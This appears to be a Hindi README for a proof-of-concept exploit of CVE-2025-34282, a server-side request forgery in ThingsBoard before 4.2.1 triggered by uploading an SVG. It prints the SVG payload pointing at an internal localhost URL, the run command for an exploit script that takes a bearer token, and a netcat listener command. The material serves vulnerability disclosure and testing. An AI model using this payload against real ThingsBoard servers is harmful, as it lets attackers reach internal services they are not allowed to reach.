
CVE-2025-34282 के लिए PoC शोषण - SVG छवि अपलोड के माध्यम से ThingsBoard SSRF
ThingsBoard IoT Platform के 4.2.1 से पहले के संस्करणों में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) कमजोरी।
टेनेंट एडमिन एक्सेस वाला हमलावर इमेज अपलोड गैलरी के माध्यम से एक आंतरिक URL संदर्भ वाली क्राफ्टेड SVG फ़ाइल अपलोड कर सकता है। जब ThingsBoard सर्वर-साइड पर SVG को प्रोसेस करता है, तो वह संदर्भित URL को लाता है — जिससे इंटरनेट पर उपलब्ध नहीं होने वाली आंतरिक सेवाओं तक पहुंच मिलती है।
| फ़ील्ड | विवरण |
|---|
| CVE | CVE-2025-34282 |
| प्रभावित संस्करण | < 4.2.1 |
| फिक्स्ड संस्करण | 4.2.1 |
| CVSS स्कोर | 6.9 मध्यम |
| CWE | CWE-918 (सर्वर-साइड रिक्वेस्ट फोर्जरी) |
| विक्रेता | https://thingsboard.io |
POST /api/image पर एक दुर्भावनापूर्ण SVG अपलोड करता है
publicLink को <object> टैग के माध्यम से एम्बेड करते हुए एक कस्टम विजेट बनाया जाता है
ssrf_localhost_5555.svg पेलोड एक आंतरिक URL संदर्भ एम्बेड करता है:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
अपलोड करने पर, ThingsBoard का सर्वर http://127.0.0.1:5555 लाता है, जो SSRF की पुष्टि करता है।
आवश्यकताएं:
pip install requests
चलाएं:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
उदाहरण:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
एक्सप्लॉइट चलाने से पहले SSRF कॉलबैक को पकड़ने के लिए एक लिसनर शुरू करें:
nc -l 5555
Tamil Mathi T.